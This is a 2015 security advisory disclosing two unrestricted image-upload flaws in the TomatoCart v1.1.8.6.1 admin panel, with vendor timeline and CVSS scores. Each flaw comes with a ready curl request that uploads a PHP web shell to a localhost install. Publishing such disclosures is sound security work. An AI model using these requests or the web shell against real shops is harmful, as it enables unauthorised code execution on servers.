Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    TomatoCart v1.1.8.6.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      support@tomatocart.com
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

TomatoCart has multiple locations where the upload of images is allowed. In two
of these locations, the file type and extension of the uploaded file are not
checked, which leads to code execution.

Please note that an admin account with at least some privileges is required to
exploit this issue.

3. Code Execution 1

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a new slide image, there are no checks as to what type the
uploaded image actually is. Because of this, an attacker that gained admin
credentials can upload a PHP file and thus gain code execution.

The rights needed are Content -> Slide Images.

Proof of Concept


curl -i -s -k  -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=--------1106460043' \
-b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
--data-binary $'----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"image1\"; filename=\"test2.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"module\"\x0d\x0a\x0d\x0aslide_images\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0asave_slide_images\x0d\x0a----------1106460043\x0d\x0aContent-Disposition: form-data; name=\"token\"\x0d\x0a\x0d\x0a0842b57bd667e448f494c7f6c268d4f3\x0d\x0a----------1106460043--\x0d\x0a' \
'http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php'

3. Code Execution 2

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a new product image, there are no checks as to what type the
uploaded image actually is. Because of this, an attacker that gained admin
credentials can upload a PHP file and thus gain code execution.

The rights needed are Content -> Products.

Proof of Concept


curl -i -s -k  -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=--------1775010584' \
-b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
--data-binary $'----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"APC_UPLOAD_PROGRESS\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"UPLOAD_IDENTIFIER\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a4194304\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"ext-gen4881\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"path\"\x0d\x0a\x0d\x0a\x0d\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"cmd\"\x0d\x0a\x0d\x0aupload\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"dir\"\x0d\x0a\x0d\x0a.\x0d\x0a----------1775010584\x0d\x0aContent-Disposition: form-data; name=\"token\"\x0d\x0a\x0d\x0a0842b57bd667e448f494c7f6c268d4f3\x
 0d\x0a----------1775010584--\x0d\x0a' \
'http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php?module=products&action=upload_image'

5. Solution

This issue has not been fixed by the vendor

6. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/TomatoCart-v11861-Code-Execution-88.html